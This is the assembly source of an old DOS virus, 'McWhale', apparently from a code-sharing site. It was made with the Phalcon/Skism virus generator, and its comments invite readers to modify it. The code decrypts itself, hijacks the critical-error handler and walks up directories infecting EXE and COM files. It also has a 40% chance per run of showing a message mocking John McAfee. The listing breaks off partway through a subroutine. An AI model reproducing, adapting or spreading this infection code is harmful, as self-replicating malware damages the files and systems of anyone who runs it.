📄 mcwhale.asm
字号:
; McWhale.asm : [McAfee' Whale] by [pAgE]
; Created wik the Phalcon/Skism Mass-Produced Code Generator
; from the configuration file skeleton.cfg
;
; Here's another "lame dick" virus! I thought it was rather fitting!
; Many thanks to the fellows at Phalcon/Skism for this little tool.
; I am sure that Dark Angel and the bunch are not stopping here, but
; will come up with another innovation in Vx production...
;
; I have set this file to activate at a 40% chance on any day. Feel free
; to modify this program as you see fit or keep it as a novelty in its
; original form.
.model tiny ; Handy directive
.code ; Virus code segment
org 100h ; COM file starting IP
id = 'MO' ; ID word for EXE infections
entry_point: db 0e9h,0,0 ; jmp decrypt
decrypt: ; handles encryption and decryption
mov bx,(offset heap - offset startencrypt)/2 ; iterations
patch_startencrypt:
mov si,offset startencrypt ; start of decryption
decrypt_loop:
db 2eh,81h,04h ; add word ptr cs:[si], xxxx
decrypt_value dw 0 ; initialised at zero for null effect
inc si ; calculate new decryption location
inc si
dec bx ; If we are not done, then
jnz decrypt_loop ; decrypt mo'
startencrypt:
call next ; calculate delta offset
next: pop bp ; bp = IP next
sub bp,offset next ; bp = delta offset
cmp sp,id ; COM or EXE?
je restoreEXE
restoreCOM:
lea si,[bp+save3]
mov di,100h
push di ; For later return
movsb
jmp short restoreEXIT
restoreEXE:
push ds
push es
push cs ; DS = CS
pop ds
push cs ; ES = CS
pop es
lea si,[bp+jmpsave2]
lea di,[bp+jmpsave]
movsw
movsw
movsw
restoreEXIT:
movsw
mov byte ptr [bp+numinfec],2 ; reset infection counter
mov ah,1Ah ; Set new DTA
lea dx,[bp+newDTA] ; new DTA @ DS:DX
int 21h
mov ah,47h ; Get current directory
mov dl,0 ; Current drive
lea si,[bp+origdir] ; DS:SI->buffer
int 21h
mov byte ptr [bp+backslash],'\' ; Prepare for later CHDIR
mov ax,3524h ; Get int 24 handler
int 21h ; to ES:BX
mov word ptr [bp+oldint24],bx; Save it
mov word ptr [bp+oldint24+2],es
mov ah,25h ; Set new int 24 handler
lea dx,[bp+offset int24] ; DS:DX->new handler
int 21h
push cs ; Restore ES
pop es ; 'cuz it was changed
dir_scan: ; "dot dot" traversal
lea dx,[bp+exe_mask]
call infect_mask
lea dx,[bp+com_mask]
call infect_mask
mov ah,3bh ; change directory
lea dx,[bp+dot_dot] ; "cd .."
int 21h
jnc dir_scan ; go back for mo!
done_infections:
mov ah,2ah ; Get current date
int 21h ;
;cmp dh,4 ; Check month
;jb exit_virus ;
;cmp dl,15 ; Check date
;jnz exit_virus ;
;mov ah,2ch ; Get current time
;int 21h
cmp dl,40 ; Check the percentage
jbe activate
exit_virus:
mov ax,2524h ; Restore int 24 handler
lds dx,[bp+offset oldint24] ; to original
int 21h
push cs
pop ds
mov ah,3bh ; change directory
lea dx,[bp+origdir-1] ; original directory
int 21h
mov ah,1ah ; restore DTA to default
mov dx,80h ; DTA in PSP
cmp sp,id-4 ; EXE or COM?
jz returnEXE
returnCOM:
int 21h
retn ; 100h is on stack
returnEXE:
pop es
pop ds
int 21h
mov ax,es ; AX = PSP segment
add ax,10h ; Adjust for PSP
add word ptr cs:[bp+jmpsave+2],ax
add ax,word ptr cs:[bp+stacksave+2]
cli ; Clear intrpts for stack manipulation
mov sp,word ptr cs:[bp+stacksave]
mov ss,ax
sti
db 0eah ; jmp ssss:oooo
jmpsave dd ? ; Original CS:IP
stacksave dd ? ; Original SS:SP
jmpsave2 db ? ; Actually four bytes
save3 db 0cdh,20h,0 ; First 3 bytes of COM file
stacksave2 dd ?
activate proc far
start:
jmp loc_1
data_1 db 0
data_2 dw 0
db 62h, 79h
db ' ABRAXAS - '
copyright db '(c) 1992 Abraxas Warez.'
db '.....................................BEWARE!!!............'
db '....................'
data_5 db 'Anti-Virus.....Man.....John.....McAfee.....wrote'
db '.....the.....WHALE.....virus!!!'
db '..............................HONEST!!!....................................$'
loc_1:
push si
push di
mov si,80h
cld ; Clear direction
call sub_1
cmp byte ptr [si],0Dh
je loc_4 ; Jump if equal
mov cx,28h
lea di,data_5 ; ('Attention: Please press ') Load ef
locloop_2:
lodsb ; String [si] to al
cmp al,0Dh
je loc_3 ; Jump if equal
stosb ; Store al to es:[di]
loop locloop_2 ; Loop if cx > 0
loc_3:
inc cx
mov al,2Eh ; '.'
rep stosb ; Rep when cx >0 Store al to es:[di]
loc_4:
pop di
pop si
mov ah,3
mov bh,0
int 10h ; Video display ah=functn 03h
; get cursor loc in dx, mode cx
mov data_2,cx
mov ah,1
mov cx,0F00h
int 10h ; Video display ah=functn 01h
; set cursor mode in cx
mov ah,2
mov dh,18h
mov dl,13h
int 10h ; Video display ah=functn 02h
; set cursor location in dx
loc_5:
mov data_1,0FFh
loc_6:
add data_1,1
mov bl,data_1
mov bh,0
mov cx,27h
call sub_2
locloop_7:
mov al,byte ptr copyright+20h[bx] ; ('.')
mov ah,0Eh
int 10h ; Video display ah=functn 0Eh
; write char al, teletype mode
inc bx
call sub_3
mov dl,0FFh
mov ah,6
int 21h ; DOS Services ah=function 06h
; special char i/o, dl=subfunc
jnz loc_10 ; Jump if not zero
loop locloop_7 ; Loop if cx > 0
cmp byte ptr copyright+20h[bx],24h ; ('.') '$'
je loc_5 ; Jump if equal
jmp short loc_6
activate endp
sub_1 proc near
loc_8:
inc si
cmp byte ptr [si],20h ; ' '
je loc_8 ; Jump if equal
retn
sub_1 endp
sub_2 proc near
push ax
push bx
push cx
push dx
mov dx,si
mov cx,di
mov al,4
mov ah,0ch
int 10h
mov ah,2
mov dh,8h
mov dl,14h
mov cx,30
int 10h ; Video display ah=functn 02h
mov ah,10h
mov al,0
mov bl,4
mov bh,63
int 10h
pop dx
pop cx
pop bx
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -